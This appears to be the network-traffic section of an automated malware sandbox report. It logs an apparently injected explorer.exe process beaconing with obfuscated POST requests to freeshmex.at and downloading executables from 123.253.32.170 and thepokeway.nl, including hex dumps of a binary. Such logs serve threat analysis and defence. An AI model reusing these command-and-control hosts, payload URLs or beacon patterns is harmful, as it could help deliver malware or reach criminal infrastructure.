                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        4 | 192.168.2.4 | 49701 | 41.41.255.235 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:02.219367981 CET | 153 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://xmevykp.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 320
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:02.219815969 CET154OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 5d 34 eb a8
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu]4bftlm&KETM0u=61`2.E:NHPjNWxONJ=>aS_-<$hzkW_FbpCLQ
                                                        Nov 20, 2022 23:29:03.169171095 CET | 155 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:02 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        5 | 192.168.2.4 | 49702 | 41.41.255.235 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:03.278062105 CET | 156 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://pewoqsllm.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 216
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:03.278083086 CET156OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7d 45 d4 e6
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu}E|$BZoomjc)SZ*sVwd\GOWf :TKS;}6a'h>zz;=]!%@
                                                        Nov 20, 2022 23:29:03.689342022 CET | 156 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:03 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 43
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 59 39 08 a6 6d 59 b5 ab 15 bd cf b5 fa 6d 86 21 da ec 71 14 10 94 8f
                                                        Data Ascii: #\(Y9mYm!q


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        6 | 192.168.2.4 | 49703 | 123.253.32.170 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:03.985562086 CET | 157 | OUT | GET /root2.exe HTTP/1.1
                                                        Connection: Keep-Alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Host: 123.253.32.170
                                                        Nov 20, 2022 23:29:04.258891106 CET | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Sun, 20 Nov 2022 22:29:04 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 1134592
                                                        Last-Modified: Sun, 20 Nov 2022 22:20:03 GMT
                                                        Connection: keep-alive
                                                        ETag: "637aa813-115000"
                                                        Accept-Ranges: bytes


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        7 | 192.168.2.4 | 49704 | 138.36.3.134 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:08.366631985 CET | 1353 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://vhuqghmu.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 166
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:09.296233892 CET | 1354 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:08 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        8 | 192.168.2.4 | 49705 | 210.182.29.70 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:10.022917986 CET | 1355 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://xwljygwi.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 138
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:11.131357908 CET | 1356 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:10 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        9 | 192.168.2.4 | 49706 | 190.140.74.43 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Nov 20, 2022 23:29:11.593775034 CET | 1357 | OUT | POST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://mubvqnkrma.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 150
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:12.459825993 CET | 1358 | IN | HTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:11 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        0 | 192.168.2.4 | 49716 | 5.135.247.111 | 443 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        2022-11-20 22:29:22 UTC | 0 | OUT | GET /upload/index.php HTTP/1.1
                                                        Connection: Keep-Alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Host: thepokeway.nl
                                                        2022-11-20 22:29:22 UTC | 0 | IN | HTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:22 GMT
                                                        Server: Apache
                                                        Content-Description: File Transfer
                                                        Content-Disposition: attachment; filename=e83a3a62.exe
                                                        Content-Transfer-Encoding: binary
                                                        Expires: 0
                                                        Cache-Control: must-revalidate
                                                        Pragma: public
                                                        Vary: Accept-Encoding
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        Content-Type: application/octet-stream
                                                        Data Ascii: I\)^#VhgYtC+5bbu;0@n{ul&"d#_lffRU}'`(U!W[(6UwVEa6`(T!}"L_0+N~I7$1KRbt3d}z0=ee>v0A=YQ6P/vt
                                                        2022-11-20 22:29:22 UTC136INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC136INData Raw: 32 30 30 30 0d 0a 20 c2 de 45 04 bf 4d 5f 94 f0 4e 03 3e 37 f6 02 38 ee 3d be ad 6d cc f5 da 55 92 46 e3 9c c2 46 1c 3a ee 17 d4 cc 6f 07 9c 09 9a c1 e9 44 d2 7c 06 d3 09 52 4a 44 60 dd 67 c2 c0 7f 6d 45 8d 29 2a a1 91 4d 7f 2c 26 15 cf 16 3c 4f 1b 5b 03 c9 7e d5 4f 7f c3 a1 bc bb 6b 21 07 51 25 f8 75 aa 43 58 4e 20 17 f1 9f c0 4f 82 90 9b 22 59 d9 c5 bf 40 f7 9e d6 51 5d 15 4c 10 72 b8 a3 b1 27 42 29 d5 ce 68 ce 8b 6b aa 69 cf 85 42 41 0a ba 97 2c 38 b7 6c 65 b9 13 85 15 0e 73 6f 7e 0d 08 aa a1 42 ce 5a ea 12 f7 98 a1 20 63 be f4 1e 2c c7 13 b6 7d 71 df 23 3c 14 e2 4e 64 1c 80 15 c1 70 e1 80 25 fd 38 e1 d3 0b 70 dc 8c d6 ac 42 37 17 ed 8e 0f b9 0c fc 0c d5 06 f5 d0 e6 0d 42 af 4a ef fc 56 c4 a5 5f ce 3f f2 3d de 0f 3b 3d 05 da 4d 3f 83 db 91 4a af c6 5b
                                                        Data Ascii: 2000 EM_N>78=mUFF:oD|RJD`gmE)*M,&<O[~Ok!Q%uCXN O"Y@Q]Lr'B)hkiBA,8leso~BZ c,}q#<Ndp%8pB7BJV_?=;=M?J[
                                                        2022-11-20 22:29:22 UTC144INData Raw: 51 ad 30 de 0a 45
                                                        Data Ascii: Q0E
                                                        2022-11-20 22:29:22 UTC144INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC144INData Raw: 32 30 30 30 0d 0a 65 3c 5c f0 84 71 cd ca fe 9f 79 0b e3 62 24 16 1a da 58 02 05 18 8d 22 bd b7 12 63 53 37 1d a4 ce 85 3c b9 81 88 8b 26 a0 33 fd 4c 0b 25 61 74 79 12 c0 eb 17 b5 23 51 dc 0d 12 89 0f d3 e5 90 db 48 e9 68 23 f5 4e 6d c9 b2 40 7a 2c 77 38 08 2e 02 a1 04 95 f6 24 68 99 30 88 a1 53 93 78 55 2e b4 d4 61 bd 62 a7 e7 3a 8b d8 d9 d5 f5 30 49 94 35 62 39 e4 b5 54 25 9c 9a 93 ab 96 a5 f9 4a 31 a9 f3 d2 ab 8d 58 ae a3 66 e2 bc cf be cd d9 d9 73 f5 16 bb a9 a0 47 7f 47 bd 07 78 dd 7a 8c ed d4 16 f7 17 73 bf 9a 97 e8 e2 02 7c 29 28 98 84 a5 41 b6 ba 3d 72 15 38 c3 46 82 5a 9f 5c 82 0b c8 70 38 b0 84 b3 1d 4d 14 5f 2e 13 09 de 93 ab 1e a6 a7 19 42 33 44 f7 c0 54 e0 75 d0 c0 15 87 77 c6 87 f8 46 d3 35 c7 ec de 64 cd 25 2c d0 2b 10 b3 0e cd fe dc f9 d1
                                                        Data Ascii: 2000e<\qyb$X"cS7<&3L%aty#QHh#Nm@z,w8.$h0SxU.ab:0I5b9T%J1XfsGGxzs|)(A=r8FZ\p8M_.B3DTuwF5d%,+
                                                        2022-11-20 22:29:22 UTC152INData Raw: 5d 2c 44 b4 aa 1c
                                                        Data Ascii: ],D
                                                        2022-11-20 22:29:22 UTC152INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC152INData Raw: 32 30 30 30 0d 0a 3b e8 67 a2 4b 60 c2 e8 8a 73 3c 68 ac bd 6c 93 c3 98 f5 64 bc 29 d7 2e e1 fe c7 26 7d 2c 02 4e df 7c 8c 3a b0 b0 31 48 16 8a d0 b3 a8 40 3d f3 bb 0a 1d d7 f4 14 f8 16 2b 64 05 6c b1 24 62 88 3c 10 ef bd 38 5d 08 1b 00 e3 48 71 0b 26 6b 51 05 ca 90 12 80 29 41 ac 2e 1c 75 70 57 06 b4 ec 1e 17 fa 76 93 d3 ed dc 22 eb 83 65 ea 08 a7 ab 75 ca 54 e8 6a 4d d3 ef 45 ef cf 59 bf 0f b4 11 dd 04 8f ec f5 d5 2f 66 a5 06 8e f3 6a 78 d8 60 5a 25 9f e3 07 8c ef e2 8d f9 28 69 65 48 3a 56 c6 d0 1f 5d e7 a7 5f bf 4c 13 cf 77 94 79 5d f1 45 9d 84 7a 93 2e 51 8c bf c9 43 ce 70 1c 98 d9 aa b6 d6 dc a0 44 a6 0a ac 01 45 9c 08 f9 b7 54 ef a7 f8 fd 2d 95 e5 35 85 47 1f d2 54 e6 20 e5 4d 5b cf 8e cb 75 e9 df c7 03 af 97 53 c2 26 77 0c 6e 85 07 d6 7d 9a fd cb
                                                        Data Ascii: 2000;gK`s<hld).&},N|:1H@=+dl$b<8]Hq&kQ)A.upWv"euTjMEY/fjx`Z%(ieH:V]_Lwy]Ez.QCpDET-5GT M[uS&wn}
                                                        2022-11-20 22:29:22 UTC160INData Raw: e5 ce 24 b1 9f 63
                                                        Data Ascii: $c
                                                        2022-11-20 22:29:22 UTC160INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC160INData Raw: 32 30 30 30 0d 0a 41 9b 29 3c d4 59 90 eb 6d 5c 5b fc 98 d0 cd 6f c4 53 97 5c f6 35 da 89 0c 31 63 2b 12 18 67 c4 24 a7 c2 63 49 1a 49 c0 1c cf 3e 73 45 95 08 6d 26 34 84 e8 a6 37 2c 7c 79 2b b8 c8 ed 44 e9 fb ee 2f 2d b9 f6 a8 c7 2e 77 79 ca cf 6a 29 7c 81 f8 a6 1e 7c 56 73 b0 a6 2c 16 6e 45 b9 bf fc 60 51 a4 66 2e 59 cc 42 99 2d 08 b8 bd 57 88 a9 0c 3a 69 bd 27 68 d3 1d 4a fe 2b 2d 3b 97 e8 2c 35 1b 88 67 05 31 3f b3 db 65 3f 59 2f 11 ab d5 30 f5 63 49 10 bc a7 d1 70 13 7d f3 f9 e4 13 13 72 a5 45 b6 c9 a8 c9 7a 57 6c b7 55 02 39 e2 84 2e 77 fa 44 f0 94 e9 99 74 58 eb 20 c9 a1 86 f4 9f f0 fb 15 48 3c ea 98 83 1a b5 de 6e 7c 9a 93 e1 24 2d 53 c3 1c 76 97 15 81 20 16 a2 ce 92 73 9c 53 1c c8 96 f3 4d f4 e3 94 f2 8a 55 b6 2d c9 4c 9f 7c b2 d9 f1 49 b1 eb 6b
                                                        Data Ascii: 2000A)<Ym\[oS\51c+g$cII>sEm&47,|y+D/-.wyj)||Vs,nE`Qf.YB-W:i'hJ+-;,5g1?e?Y/0cIp}rEzWlU9.wDtX H<n|$-Sv sSMU-L|Ik
                                                        2022-11-20 22:29:22 UTC168INData Raw: ce 73 bd 86 de 70
                                                        Data Ascii: sp
                                                        2022-11-20 22:29:22 UTC168INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC168INData Raw: 32 30 30 30 0d 0a 7f 71 c5 fe 2b 10 bd f1 db 1b dd 89 39 04 c1 cc b2 b3 e9 04 3f 3b 09 69 5f 63 6a 1e 92 03 08 bc f2 25 18 bb 2b bf 70 32 15 47 b4 8e 40 22 81 9c ba c9 ce cd ac 6e b5 59 06 24 b5 5e 07 7a 07 9d d6 70 e3 7a 17 98 80 1e 40 1e 9f 1b b6 d2 55 98 79 6a bc 1e 60 20 25 aa 50 07 6f 9e 1d 18 c6 bf 28 c5 9a 53 28 c0 69 be 47 ba f2 32 68 d6 55 be f6 6a 6a 2b d4 34 77 f1 f8 bc 5f a8 22 41 04 c4 c7 0e d8 e2 f8 11 a3 76 fa b7 3e e5 54 0f e7 be a9 04 bd fd c6 65 b7 40 bd 34 0c d1 44 3d 76 82 bb fa ad 83 e1 5b 4b f1 46 09 4a 8c 40 e1 8b f2 16 f3 55 4f b8 ab f8 9c 17 e8 0f 60 6c e5 fb d3 ff 24 9e b5 01 4a f8 57 1d 86 6f 30 81 c7 ad 30 bc ac 68 21 b6 35 05 14 1e 80 e6 64 da 71 37 6e ff ef d1 4d 90 02 41 3f e5 07 6b 89 76 99 2b 8b 6b e6 1e 68 c0 30 c2 a8 6c
                                                        Data Ascii: 2000q+9?;i_cj%+p2G@"nY$^zpz@Uyj` %Po(S(iG2hUjj+4w_"Av>Te@4D=v[KFJ@UO`l$JWo00h!5dq7nMA?kv+kh0l
                                                        2022-11-20 22:29:22 UTC176INData Raw: e8 b8 95 4b 6d 1e
                                                        Data Ascii: Km
                                                        2022-11-20 22:29:22 UTC176INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC176INData Raw: 32 30 30 30 0d 0a 45 4d d9 2d 7c 6b 1c 6f 50 92 cd e5 a1 f7 4a b2 44 e2 19 98 91 e0 5d 67 0a 17 55 55 33 fc dd ad 3e b9 b7 ba b4 54 e2 86 26 a1 bf aa e1 65 ab 55 8c a2 4f 39 53 d9 99 35 b6 ab 32 73 ca 41 cd dd bf 60 c9 90 96 c6 11 6e c6 95 ef 2b 35 7c 90 10 73 7f 38 54 2a e4 98 7b ed 7a 95 68 de 78 95 47 f4 20 30 a1 12 13 48 5b 90 ed 2f ff 9b f9 a7 05 ec 75 1c 6f f2 d4 56 52 9e af 10 db bc 51 89 0e b5 17 e9 9a 01 a1 86 8e ac 01 93 20 56 6c 6e ba 54 74 0b d2 3a ad d2 bb 19 d7 c8 89 5b 35 a8 53 ce f2 f4 6f 6d 25 0b aa 97 87 2d 81 16 31 11 af a2 01 d8 e5 50 0e 07 53 23 8c 4d be 99 84 47 67 8b f5 b9 3d c3 1c 2f 28 e7 f9 d1 18 5b 9f 74 4e 04 f7 3d 63 b0 2a 65 12 a6 ab c8 78 f5 bb 57 d2 cb 37 53 ba 59 7a e8 a9 f8 8e fc 3d 92 cc d9 4b 13 4e 4b 8b 1f 1b 80 ba a6
                                                        Data Ascii: 2000EM-|koPJD]gUU3>T&eUO9S52sA`n+5|s8T*{zhxG 0H[/uoVRQ VlnTt:[5Som%-1PS#MGg=/([tN=c*exW7SYz=KNK
                                                        2022-11-20 22:29:22 UTC184INData Raw: c6 e4 f2 6f e3 34
                                                        Data Ascii: o4
                                                        2022-11-20 22:29:22 UTC184INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC184INData Raw: 31 66 66 38 0d 0a 96 a6 c7 2f c1 ce 0f c5 54 be 72 0e 42 36 b3 d2 94 eb c2 cb a0 89 c0 97 f4 f8 c1 92 4b 95 ae f6 d1 12 a6 4a a8 c5 51 99 3d e5 06 0e b6 ca 45 2f ee 57 93 27 64 17 34 87 4b 9f fc 90 97 e6 c7 d9 00 7c 8f e4 97 24 a5 2c ab 41 7a 3b 87 4c c4 9f 67 f6 d0 df a0 ed a1 f1 ca f0 8a 80 34 8c 2e 32 91 a7 4c f4 33 5f 81 06 c5 78 89 1d 03 91 72 48 78 6b b8 4d 98 bf 30 06 33 75 5e 26 a4 ce 65 6b d0 a3 b4 09 f1 b0 71 91 83 97 c5 c8 f3 a4 24 a5 08 0f 26 c1 3a 0f 0b d0 f0 4f 69 c4 5c d1 d1 a0 7e 37 cc 79 2c b2 94 4a d6 c6 72 7d 7d f6 ac bb 25 61 07 2a 63 c5 e9 c7 eb c5 1a 41 f2 99 9d aa 8b 38 4c f2 99 e2 22 72 11 c1 4b c1 fa e6 81 d6 0b 06 f0 a4 23 85 2a 94 c9 36 a0 96 72 ef 65 9b 21 f5 41 f9 1b a3 7f 5e dd c5 36 d1 57 dd 64 80 89 71 f2 a2 f8 2a 63 4e 98
                                                        Data Ascii: 1ff8/TrB6KJQ=E/W'd4K|$,Az;Lg4.2L3_xrHxkM03u^&ekq$&:Oi\~7y,Jr}}%a*cA8L"rK#*6re!A^6Wdq*cN
                                                        2022-11-20 22:29:22 UTC192INData Raw: 32 30 30 30 0d 0a
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC192INData Raw: 09 7d 58 51 a3 e3 55 38 c3 b9 89 41 27 8e 8d cc c2 68 65 3e 0b 39 3c a9 1f bf 8d 74 67 c4 bf 07 a7 fb 35 d4 1a 3d fe 98 0e 2e 5c 0a 25 b4 bf e1 52 58 c6 11 39 63 c1 a4 ba 44 5c 2d 1a 7c cc d4 e9 19 ef cb 75 3c 38 bf 93 f9 09 13 3c 2d d0 ba 17 77 af 9b d6 68 51 73 05 6e cc 87 44 eb ae a3 9c fa e2 a2 af c7 7c a1 9b ed 1a 11 bc 68 8a 8f 26 dd b6 8d 1d ca dd 76 b7 67 49 a1 ee 46 b2 be c9 7e b5 ef 2e 6f 06 53 e9 38 2e 42 4e 99 ec 65 0b fa a0 37 5d 2d 9a 27 a7 43 ab 41 9f 1d ab f6 7e b6 46 a7 08 13 10 11 8f 31 4f 6e 8d b0 5a 6c 8a 2c 22 c1 4b 89 a0 16 56 53 c4 d0 4e 50 95 7e be 7c d7 7d dd 13 79 a0 8a b8 24 6c 53 73 3b 21 38 9e 38 db d6 de 95 9a b5 cc c0 42 1d f7 3e 7f 12 56 7f b6 10 b3 70 0a db d7 e0 f6 0d 24 ac 8a a1 67 1d ea f1 85 06 00 16 4f c3 b3 5f 53 af
                                                        Data Ascii: }XQU8A'he>9<tg5=.\%RX9cD\-|u<8<-whQsnD|h&vgIF~.oS8.BNe7]-'CA~F1OnZl,"KVSNP~|}y$lSs;!88B>Vp$gO_S
                                                        2022-11-20 22:29:22 UTC200INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC200INData Raw: 32 30 30 30 0d 0a ae a6 11 02 49 d0 8e 8c 26 f1 84 3b a7 8b a0 8d ed 5a 64 70 d4 65 fc d5 c8 d6 e1 c7 64 df d3 df e6 26 06 b5 0e 6c 9e 37 68 2a 19 a9 e3 7f d9 bd 03 b6 e1 db 30 3b 56 a7 20 6d c0 8a 24 dd 3a 28 b8 ee 57 fe f2 b5 a0 c2 6a f3 9f 3b 6c a8 22 6e c2 11 81 df 48 01 79 33 95 9e 76 1e 80 ef 1a 35 ad fe 15 2e 43 2b d2 12 3a e4 9c 90 96 21 d9 45 b1 ee 7e 4b 01 38 66 08 ec 16 49 a6 1b 94 9b e6 3f 57 6b ea cc cb 7f 3b ff 0b 04 28 ac a0 57 dc 41 d3 48 8b e3 1a 81 f6 a4 33 9c 82 5c 41 cb 6f 9c aa 75 fc fa cd e5 93 6f 0b 8a d1 78 0b 96 ab 3b 3e 0d 4d 04 77 fe 14 07 24 7d f9 b2 fb 14 3e a0 f7 5c 49 f1 2a e1 91 2f 24 30 e1 7f d6 e0 90 46 66 8f 4b c2 79 9b 8c d7 c4 66 20 a7 cf d1 fd 75 74 be 06 14 d0 3a 6a 1c fd 30 f8 d3 b5 87 e6 b5 53 3d fa b1 a1 22 29 2c
                                                        Data Ascii: 2000I&;Zdped&l7h*0;V m$:(Wj;l"nHy3v5.C+:!E~K8fI?Wk;(WAH3\Aouox;>Mw$}>\I*/$0FfKyf ut:j0S="),
                                                        2022-11-20 22:29:22 UTC208INData Raw: 64 fb 6c ac 0b a4
                                                        Data Ascii: dl
                                                        2022-11-20 22:29:22 UTC208INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC208INData Raw: 32 30 30 30 0d 0a 94 bd 0a 15 be fa 85 82 ae 46 b2 34 26 00 fa 77 0f 21 5d 99 bc 7f bb 54 6d 7e 4f af fc 72 0d 3b bc 54 2b 6e 3e 8b 32 06 98 ea 17 84 b8 31 77 87 05 9c 8f 03 52 01 0c 70 f9 f7 55 e6 54 ab 7a 98 e1 62 1f f8 84 64 fc 9d e7 18 07 b7 9b 31 4c 9f 50 1b 07 de 1e 06 06 75 3e 59 bc 56 75 97 f0 13 00 26 93 5f b3 72 a2 2a d7 bd 00 03 10 b1 a5 e0 55 54 8b 99 a9 d8 85 57 00 f4 da 09 70 1d c1 19 1c 4c 1a ec 7e a8 4d 00 74 ba 63 31 43 41 ff 39 1c 2b 9b da fa 9a c2 4d f1 5d 3c f0 63 f2 e1 4e a5 1d 2f e8 60 6e 3e 78 b7 cc b6 9e 63 52 f3 c2 22 81 14 08 eb e5 00 99 84 17 5a 32 85 7e 49 42 53 05 08 33 60 ce 64 43 14 94 0e 27 92 6d 61 8d 27 ee f8 12 02 06 ab 3a 8e 65 f4 12 0e d3 31 9b fb 90 20 28 b8 24 b9 78 eb 95 63 19 26 0d 52 a8 f5 f0 5a ed 97 a2 5f 94 37
                                                        Data Ascii: 2000F4&w!]Tm~Or;T+n>21wRpUTzbd1LPu>YVu&_r*UTWpL~Mtc1CA9+M]<cN/`n>xcR"Z2~IBS3`dC'ma':e1 ($xc&RZ_7
                                                        2022-11-20 22:29:22 UTC216INData Raw: cd 6c 97 32 61 57
                                                        Data Ascii: l2aW
                                                        2022-11-20 22:29:22 UTC216INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC216INData Raw: 32 30 30 30 0d 0a 81 e5 4d 67 1d a5 5b 49 9a b3 51 a9 ee 60 d9 28 20 b7 42 e2 14 44 b0 18 fc 51 06 f8 fb f8 d6 78 e6 db 56 0c 1b 3e b2 b5 7d 1f 57 09 65 4c d2 f6 c5 85 c5 89 c7 9e 4e 36 29 83 38 16 02 1b d2 ab 17 6a d6 74 b9 76 6a 7e 88 e3 cf dc 89 95 ea 45 e3 ea 41 2e d6 f9 8d a8 f7 62 9d 3e 06 3a 9a 06 bc 16 d8 71 20 cd 17 1f 8c 5d 05 01 15 b5 32 fa 6b c7 6c 61 54 0f 5d 2b c7 8b 1b 9b d7 7e 3c 8f 06 c5 ad b2 99 91 db 17 79 8c 95 ea 3d de f5 6c ab e8 19 e8 f6 b5 79 7e 79 67 b7 57 4b c4 9d 61 b2 63 6b b3 91 5c 9d db 49 21 ad 2e 5c 63 f8 6a cd 39 2c dc 7f 59 ae 4b ce 54 64 44 77 91 6c 0e cb 75 2b 8b 51 a9 c7 1d de 45 af eb 90 e1 9c 94 8c 3c 53 af c8 43 bc 2e 8e f0 a7 b4 1f 18 a2 f6 ea 68 fb 8b be 3c 17 ef 18 ce ce 49 19 62 a7 c5 99 55 3d 47 06 49 34 12 46
                                                        Data Ascii: 2000Mg[IQ`( BDQxV>}WeLN6)8jtvj~EA.b>:q ]2klaT]+~<y=ly~ygWKack\I!.\cj9,YKTdDwlu+QE<SC.h<IbU=GI4F
                                                        2022-11-20 22:29:22 UTC224INData Raw: 30 ea 50 63 c2 02
                                                        Data Ascii: 0Pc
                                                        2022-11-20 22:29:22 UTC224INData Raw: 0d 0a
                                                        Data Ascii:
